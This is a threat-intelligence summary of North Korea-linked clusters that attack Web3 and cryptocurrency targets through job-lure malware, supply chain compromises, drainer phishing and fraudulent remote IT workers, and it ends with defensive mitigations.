Full Report
Multiple threat activity clusters with ties to North Korea (aka Democratic People's Republic of Korea or DPRK) have been linked to attacks targeting organizations and individuals in the Web3 and cryptocurrency space. "The focus on Web3 and cryptocurrency appears to be primarily financially motivated due to the heavy sanctions that have been placed on North Korea," Google-owned Mandiant said in
Analysis Summary
# Threat Actor: North Korea (DPRK) Nexus Threat Actors
## Attribution & Identity
Attribution is tied to the Democratic People's Republic of Korea (DPRK). Multiple distinct activity clusters are tracked, including: **UNC1069**, **UNC4899**, **UNC5342**, **UNC4736**, **UNC3782**, and **UNC5267** (associated with the mass remote employment scheme). UNC4899 overlaps with **Jade Sleet**, **PUKCHONG**, **Slow Pisces**, and **TraderTraitor**. UNC5342 overlaps with **Contagious Interview**, **DeceptiveDevelopment**, **DEV#POPPER**, and **Famous Chollima**. A significant portion of IT workers involved in the remote employment scheme are affiliated with the **313 General Bureau of the Munitions Industry Department**.
## Activity Summary
Threat clusters are heavily focused on generating illicit financial gains, primarily targeting the **Web3 and cryptocurrency space** to circumvent international sanctions and fund North Korea's WMD program.
* **UNC1069** targets diverse industries for financial gain using social engineering.
* **UNC4899** and **UNC5342** target developers in the blockchain community, often using job-themed lures to deliver malware via fake coding assignments. They have also engaged in supply chain compromises.
* **UNC4736** specifically targets the blockchain industry by trojanizing trading software applications (attributed to the 3CX supply chain attack in early 2023).
* **UNC3782** conducts large-scale phishing campaigns against cryptocurrency users (e.g., against TRON and Solana users in 2023/2024) deploying drainer malware.
* **UNC5267** and associated clusters involve thousands of DPRK citizens taking remote IT jobs in the West/Asia using stolen or fabricated identities (including deepfakes for interviews) to maintain long-term network access, extort employers, and funnel salaries back to Pyongyang. These IT workers are increasingly conducting insider attacks, stealing data, and enabling cyberattacks from privileged positions.
## Tactics, Techniques & Procedures
- Developing custom tools across multiple languages, including Golang, C++, and Rust.
- Exploiting trust within the Web3/blockchain community via job-themed social engineering lures.
- Delivering malware through employment opportunities disguised as coding assignments.
- Orchestrating supply chain compromises (e.g., UNC4736).
- Conducting large-scale phishing operations aimed at cryptocurrency drainer deployment.
- Utilizing sophisticated identity manipulation, including deepfake technology, to conceal operative identities during remote job interviews, allowing a single operator to use multiple personas.
- Leveraging privileged access obtained via long-term infiltration (DPRK IT worker scheme) for data theft and extortion.
## Targeting
- Sectors: Web3, cryptocurrency, blockchain development, and technology sectors.
- Geography: Targeting organizations and individuals globally, with documented IT worker placement in the U.S., Europe, and Asia (residing primarily in China and Russia).
- Victims: Cryptocurrency and blockchain developers; TRON and Solana users; organizations employing DPRK IT workers.
## Tools & Infrastructure
- Malware development utilizing Golang, C++, and Rust.
- Cryptocurrency drainers (used by UNC3782).
- Custom tools capable of infecting Windows, Linux, and macOS operating systems.
- Infrastructure associated with the supply chain attacks (specific malware/C2 not detailed in excerpt, only activity).
- **Synthetic Identities**: Use of fabricated personas and deepfake technology for operational security.
## Implications
The primary strategic implication is the DPRK’s dedicated effort to bypass severe international sanctions through massive, targeted cryptocurrency theft. The increasing sophistication of their IT worker infiltration scheme, utilizing deepfakes and maintaining long-term roles within target organizations, poses a significant insider threat risk that enables both revenue generation and direct access for subsequent cyber operations.
## Mitigations
- Heightened vigilance in Vetting remote employees, especially IT professionals, including enhanced background checks and scrutiny of synthetic aspects of identity (given the use of deepfakes).
- Implementing strict network segmentation and strong privileged access management (PAM) to limit potential lateral movement by compromised insiders.
- Employing advanced security solutions capable of detecting threats across Windows, Linux, and macOS environments to counter bespoke malware.
- Security awareness training specifically focused on social engineering related to job offers and investment opportunities within the cryptocurrency sector.